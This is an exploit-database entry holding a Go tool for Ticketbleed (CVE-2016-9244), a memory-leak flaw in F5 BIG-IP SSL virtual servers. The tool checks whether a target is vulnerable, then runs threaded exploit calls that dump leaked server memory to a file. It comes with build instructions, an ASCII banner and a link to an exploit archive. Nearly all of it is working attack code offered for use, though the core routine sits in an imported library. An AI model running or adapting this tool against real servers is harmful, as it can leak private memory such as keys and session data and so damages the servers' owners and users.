/* # Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage] # Date: [10.02.2017] # Exploit Author: [Ege Balcı] # Vendor Homepage: [https://f5.com/] # Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1] # Tested on: [Multiple] # CVE : [CVE-2016-9244] BUILD: go get github.com/EgeBalci/Ticketbleed go build Ticketbleed.go USAGE: ./ticketbleed OPTIONS: -o, --out Output filename for raw memory -s, --size Size in bytes to read -h, --help Print this message */ package main import "github.com/EgeBalci/Ticketbleed" import "strconv" import "strings" import "fmt" import "os" var OutputFile string = "" var BleedSize int = 0 func main() { ARGS := os.Args[1:] if len(ARGS) < 1 || len(ARGS) > 5{ fmt.Println(Help) os.Exit(1) } for i := 0; i < len(ARGS); i++{ if ARGS[i] == "-h" || ARGS[i] == "--help"{ fmt.Println(Help) os.Exit(1) } if ARGS[i] == "-o" || ARGS[i] == "--out"{ OutputFile = ARGS[i+1] } if ARGS[i] == "-s" || ARGS[i] == "--size"{ Size,err := strconv.Atoi(ARGS[i+1]) if err != nil { fmt.Println("[-] ERROR: Invalid size value !") os.Exit(1) } if Size < 0 { fmt.Println("[-] ERROR: Size can't be smaller than 0") os.Exit(1) }else{ BleedSize = Size } } } if OutputFile != "" { File, FileErr := os.Create(OutputFile) if FileErr != nil { fmt.Println("[-] ERROR: While creating output file !") os.Exit(1) } File.Close() fmt.Println("[*] Output file: "+OutputFile) } VulnStatus := Ticketbleed.Check(ARGS[0]) // First check if it's vulnerable fmt.Println(VulnStatus) if strings.Contains(VulnStatus, "[+]") { go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) // With using multiple threads it is easyer to move on stack Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2)) // Othervise server echoes back alot of duplicate value } } var Help string = ` ▄▄▄█████▓ ██▓ ▄████▄ ██ ▄█▀▓█████▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ██▄█▒ ▓█ ▀▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ▓███▄░ ▒███ ▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌ ░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██▒ █▄░▒████▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ ░ ▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ ░ ▒ ░░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Author: Ege Balci Github: github.com/EgeBalci USAGE: ./ticketbleed OPTIONS: -o, --out Output filename for raw memory -s, --size Size in bytes to read -h, --help Print this message ` https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-11]